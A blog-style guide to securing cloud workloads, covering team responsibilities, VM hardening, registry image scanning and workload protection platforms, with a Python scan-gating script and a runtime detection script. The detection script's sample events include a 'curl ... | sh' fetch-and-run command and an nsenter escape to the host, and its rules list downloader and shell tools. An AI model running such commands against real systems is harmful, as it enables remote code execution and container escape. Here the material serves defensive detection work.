We’ve posted quite a bit about how more companies are shifting their workloads to the cloud. But a key question is how do you secure those workloads once they are there? With so many different permutations of cloud workloads, from virtual machines to endpoints to containers, getting started with securing it all can seem a little overwhelming. So what are some cloud workload security best practices?
First and foremost, you need the right people and policies and organizational structures in place. There’s a saying that organizations don’t have technology problems, they have people and process problems.
Protecting your cloud workloads should begin with a designated point person who oversees security in the cloud. This person should work closely with devops, devsecops, and other cloud users to understand their business needs, and work with those teams to develop processes and procedures that keep cloud workloads secure. This may include educating employees on their responsibilities for security, on common risks, and on which procedures or tools should be used to mitigate those risks.
Pay attention to:
Security is everyone’s responsibility, but extending a hand as a partner can go a long way to getting other teams to buy into promoting a culture of continuous security improvement.
To protect your virtual machine workloads, take the following steps:
Remember that under the Shared Responsibility Model the provider secures the cloud itself (facilities, hardware, hypervisor), while your organization is responsible for security in the cloud: the guest operating system and its patches, the applications, the data, and the identity and network configuration around them. That means anti-malware, host firewalls, and endpoint security and endpoint posture management agents need to be baked into every cloud image you build, not bolted on after an instance is already serving traffic.
Many organizations already have endpoint protection such as EDR in place, and many EDR vendors have adapted their products to cloud deployments. However, agents designed for long-lived corporate laptops often cope poorly with instances that autoscale and live for minutes, so cloud-native solutions that enroll automatically and tolerate ephemeral hosts are usually a better option.
Container controls can usually start with image scanning from your registry provider. Both Google and AWS offer image scanning (Amazon ECR image scanning and Artifact Registry vulnerability scanning on Google Cloud, for example) that integrates natively with their registries, so vulnerability checks on push and on a schedule can be automated and the manual burden on the team reduced. Keep in mind what these scanners cover: known vulnerabilities in the OS and language packages inside the image. They do not see what a container does once it is running, and an image that scanned clean at build time may have new findings a week later, so rescan periodically, not only on push. Runtime scanning requires a third-party tool, typically deployed as an agent on every node that runs containers (a Kubernetes DaemonSet, for instance) rather than installed into each container, to monitor for attacks.
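Automating the scan is only half the control; the other half is deciding, in the pipeline, whether the findings block the deploy. The script below is an added example, not code from the original post or from AWS: it parses the JSON shape returned by `aws ecr describe-image-scan-findings` (the `imageScanStatus` and `imageScanFindings.findings[]` fields), fails closed if the scan has not finished, and blocks on any finding at or above a chosen severity unless its ID is explicitly allowlisted. `SAMPLE_SCAN` is constructed for this example, and the CVE-style IDs in it are placeholders, not real advisories.

```python
"""Gate a container image on its registry scan findings.

Added example, not code from the original post or from AWS. It reads the
JSON produced by `aws ecr describe-image-scan-findings` and returns a
non-zero exit status when findings at or above a severity threshold are
present. SAMPLE_SCAN is constructed; its CVE-style IDs are placeholders.
"""
import json
import sys

# ECR reports these severity strings; rank them so a threshold can be compared.
SEVERITY_RANK = {"UNDEFINED": 0, "INFORMATIONAL": 0, "LOW": 1,
                 "MEDIUM": 2, "HIGH": 3, "CRITICAL": 4}

# Constructed sample in the describe-image-scan-findings shape (IDs are fake).
SAMPLE_SCAN = json.dumps({
    "imageScanStatus": {"status": "COMPLETE"},
    "imageScanFindings": {
        "findings": [
            {"name": "CVE-0000-0001", "severity": "CRITICAL",
             "attributes": [{"key": "package_name", "value": "openssl"},
                            {"key": "package_version", "value": "1.1.1k-1"}]},
            {"name": "CVE-0000-0002", "severity": "HIGH",
             "attributes": [{"key": "package_name", "value": "glibc"},
                            {"key": "package_version", "value": "2.31-13"}]},
            {"name": "CVE-0000-0003", "severity": "MEDIUM",
             "attributes": [{"key": "package_name", "value": "curl"},
                            {"key": "package_version", "value": "7.74.0-1"}]},
        ],
        "findingSeverityCounts": {"CRITICAL": 1, "HIGH": 1, "MEDIUM": 1},
    },
})


def parse_findings(scan_json):
    """Flatten the scan document into {id, severity, package, version} dicts.

    Refuses to proceed unless the scan actually finished: an IN_PROGRESS or
    FAILED scan carries no findings, and treating "no findings" as "clean"
    is the classic way a gate like this gets silently bypassed.
    """
    doc = json.loads(scan_json)
    status = doc.get("imageScanStatus", {}).get("status")
    if status != "COMPLETE":
        raise RuntimeError(f"image scan did not complete (status={status})")
    findings = []
    for f in doc.get("imageScanFindings", {}).get("findings", []):
        attrs = {a["key"]: a["value"] for a in f.get("attributes", [])}
        severity = f.get("severity", "UNDEFINED").upper()
        if severity not in SEVERITY_RANK:
            # Fail closed on a severity string we do not understand.
            raise ValueError(f"unknown severity {severity!r} on {f.get('name')}")
        findings.append({
            "id": f["name"],
            "severity": severity,
            "package": attrs.get("package_name", "?"),
            "version": attrs.get("package_version", "?"),
        })
    return findings


def blocking_findings(findings, threshold="HIGH", allowlist=frozenset()):
    """Return the findings that should fail the build: severity at or above
    `threshold` and ID not explicitly allowlisted."""
    floor = SEVERITY_RANK[threshold.upper()]
    return [f for f in findings
            if SEVERITY_RANK[f["severity"]] >= floor and f["id"] not in allowlist]


def main(argv):
    # Hypothetical usage: aws ecr describe-image-scan-findings ... | python gate.py HIGH
    threshold = argv[1] if len(argv) > 1 else "HIGH"
    scan_json = SAMPLE_SCAN if sys.stdin.isatty() else sys.stdin.read()
    blocking = blocking_findings(parse_findings(scan_json), threshold)
    for f in blocking:
        print(f"{f['severity']:<8} {f['id']} {f['package']} {f['version']}")
    return 1 if blocking else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Treat the allowlist as a liability ledger rather than a permanent exception: every entry should record who accepted the risk and an expiry date, or the gate degrades into a list of things nobody looks at.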
A relatively new category, cloud workload protection platforms (CWPP) can offer complete security observability for your cloud workloads, collecting and analyzing real-time workload activity in detail—for hosts, VMs, containers, microVMs, and serverless functions—alongside the cloud infrastructure and orchestrator telemetry that acts as the control plane for these cloud-native applications.
The best ones map what they observe to industry frameworks such as MITRE ATT&CK (for classifying attacker behavior) and CIS Benchmarks (for hardened configuration baselines), and can produce the evidence needed for compliance audits such as SOC 2, so you can show that you meet recognized standards for security.
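To make the two preceding paragraphs concrete: the kind of real-time workload activity a CWPP collects for containers is, at its simplest, a stream of process-exec events, and "taking advantage of MITRE ATT&CK" means each detection carries the technique it evidences. The script below is an added example, not code from the original post or from any vendor's product. It runs three rules over such a stream and tags every hit with an ATT&CK technique ID. The event schema (JSON lines with `container`, `image`, `user`, `parent`, `proc`, `argv`) and the `SAMPLE_EVENTS` are constructed for this example; adapt the field names to what your sensor actually emits.

```python
"""Detect suspicious process activity in container runtime telemetry.

Added example, not code from the original post or any CWPP vendor. The
event schema and SAMPLE_EVENTS are constructed; 203.0.113.9 is a
documentation (TEST-NET-3) address, not a real host.
"""
import json

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
DOWNLOADERS = {"curl", "wget"}

# Constructed telemetry: an nginx container that gets popped and an API
# container where someone tries to break out to the node.
SAMPLE_EVENTS = "\n".join([
    '{"ts":"2024-01-01T10:00:00Z","container":"web-1","image":"nginx:1.25","user":"nginx","parent":"nginx","proc":"nginx","argv":["nginx","-g","daemon off;"]}',
    '{"ts":"2024-01-01T10:00:05Z","container":"web-1","image":"nginx:1.25","user":"root","parent":"nginx","proc":"sh","argv":["sh","-c","curl http://203.0.113.9/x | sh"]}',
    '{"ts":"2024-01-01T10:00:05Z","container":"web-1","image":"nginx:1.25","user":"root","parent":"sh","proc":"curl","argv":["curl","http://203.0.113.9/x"]}',
    '{"ts":"2024-01-01T10:01:00Z","container":"api-2","image":"api:3.1","user":"app","parent":"api","proc":"python3","argv":["python3","/app/server.py"]}',
    '{"ts":"2024-01-01T10:02:00Z","container":"api-2","image":"api:3.1","user":"root","parent":"sh","proc":"nsenter","argv":["nsenter","-t","1","-m","-u","-i","-n","-p","--","bash"]}',
])


def rule_shell_from_service(ev):
    """A shell whose parent is not itself a shell: an injected or interactive
    command inside a workload that should only ever run its service binary.
    ATT&CK T1059.004, Command and Scripting Interpreter: Unix Shell."""
    if ev["proc"] in SHELLS and ev["parent"] not in SHELLS:
        return "T1059.004", f"{ev['parent']} spawned {ev['proc']}"
    return None


def rule_ingress_tool(ev):
    """curl/wget at runtime: normal during an image build, rarely legitimate
    inside a running production container. ATT&CK T1105, Ingress Tool Transfer."""
    if ev["proc"] in DOWNLOADERS:
        return "T1105", f"{ev['proc']} {' '.join(ev['argv'][1:])}"
    return None


def rule_escape_to_host(ev):
    """nsenter targeting PID 1 joins the host's namespaces, the textbook move
    after gaining a privileged-container foothold. ATT&CK T1611, Escape to Host."""
    if ev["proc"] != "nsenter":
        return None
    argv = ev["argv"]
    for i, arg in enumerate(argv[:-1]):
        if arg in ("-t", "--target") and argv[i + 1] == "1":
            return "T1611", "nsenter into PID 1 namespaces"
    return None


RULES = [rule_shell_from_service, rule_ingress_tool, rule_escape_to_host]


def detect(events_jsonl):
    """Run every rule over every event; return one alert dict per hit."""
    alerts = []
    for line in events_jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule in RULES:
            hit = rule(ev)
            if hit is None:
                continue
            technique, detail = hit
            alerts.append({
                "ts": ev["ts"], "container": ev["container"], "image": ev["image"],
                "user": ev["user"], "rule": rule.__name__,
                "technique": technique, "detail": detail,
            })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['container']:<6} {a['technique']:<10} {a['rule']}: {a['detail']}")
```

Expect the first rule to be noisy at first: many images have an ENTRYPOINT of `sh -c ...`, and a legitimate `kubectl exec` also spawns a shell from a non-shell parent. Tune it with a per-image allowlist and correlate with the orchestrator's audit log, which is exactly the control-plane telemetry the CWPP description above calls for, rather than turning the rule off.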
At the end of the day, it’s difficult to secure what you can’t see. A cloud-native analytics platform can give you deep insight into workload behavior, posture, and performance. Tooling that lets you ask arbitrary questions of your cloud endpoints (which processes are running, which images are deployed, which hosts are missing a patch) and get answers quickly is vital for securing complex cloud environments, supporting forensics, and assessing weak points and current status.
Technology and business requirements are constantly evolving, and not always in the same direction. As the business presses for speed, agility, and flexibility, those needs must be balanced against the necessity for security. The cloud landscape is very much in flux, with many organizations stuck in the middle space between hybrid and fully cloud-native, but following these best practices can give you a good starting point to securing your cloud workloads.